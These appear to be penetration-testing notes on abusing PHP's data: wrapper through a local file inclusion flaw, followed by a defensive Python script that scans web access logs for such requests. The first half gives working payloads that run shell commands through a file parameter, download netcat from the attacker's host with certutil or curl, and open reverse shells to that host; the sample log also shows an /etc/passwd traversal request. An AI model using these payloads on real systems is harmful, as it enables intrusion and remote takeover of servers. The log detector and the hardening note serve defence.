The `data:` wrapper can be used to exploit Directory Traversal and LFI. It gives us additional flexibility when attempting to inject PHP code via LFI vulnerabilities, and provides an alternative payload when we cannot poison a local file with PHP code.
```
# We know this is vulnerable to LFI, so we use the data wrapper.
# Hence, LFI without manipulating the local file.
# Adding shell_exec at the end to see the result.
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("whoami")?>
```
Once we see the result of shell_exec, we have a web shell. The next step is always to transfer nc.exe (Windows) or the netcat binary and then get the shell back on our terminal using the following approach:
1. Host a Python web server on our attacking Kali machine.
2. http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("certutil.exe -urlcache -f http://<Attacking IP>/nc.exe nc.exe")?>
3. Once nc.exe is transferred, issue the following command to get the local shell:
   nc.exe -e cmd.exe <Kali's IP> <port>
4. If the victim is a Kali (Linux) machine, transfer the netcat binary instead (curl's -o takes the output filename, then the URL):
   http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("curl -o nc.exe http://<Attacking IP>/nc.exe")?>
5. netcat -e /bin/bash <Kali's IP> <port>

# Try all transfer methods if one doesn't work.
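From the defender's side, the requests above leave a clear trace in the web server's access log. The following script is an added example (not part of the original notes) that scans constructed combined-format log lines and flags any query parameter carrying a PHP stream wrapper such as `data:`, inline PHP tags, or a traversal sequence; the hosts, timestamps and `menu.php?file=` parameter are assumed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Markers of LFI/RFI abuse in a parameter that the application passes to include():
# a PHP stream wrapper (data:, php:, ...), a traversal sequence, or inline PHP tags.
WRAPPER_RE = re.compile(r'^(data|php|file|expect|phar|zip|ftp|https?):', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Apache/Nginx combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None for a clean/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group('target')).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; undo a second layer of encoding
        reasons = []
        if WRAPPER_RE.match(decoded):
            reasons.append('stream wrapper')
        if TRAVERSAL_RE.search(decoded):
            reasons.append('directory traversal')
        if PHP_TAG_RE.search(decoded):
            reasons.append('inline PHP code')
        if reasons:
            return {'ip': m.group('ip'), 'ts': m.group('ts'), 'status': m.group('status'),
                    'param': name, 'value': decoded, 'reasons': reasons}
    return None

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (hypothetical hosts and timestamps) mirroring the requests above.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /menu.php?file=home.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2024:10:01:07 +0000] "GET /menu.php?file=data:text/plain,'
    '%3C?php%20echo%20shell_exec(%22whoami%22)?%3E HTTP/1.1" 200 17',
    '10.0.0.9 - - [12/Mar/2024:10:01:30 +0000] "GET /menu.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1832',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r} -> {', '.join(f['reasons'])}")
```

Note that `include()` of a `data:` URL only works when PHP's `allow_url_include` is enabled, so keeping it off (its default) removes this payload entirely; the log check above then catches the attempts.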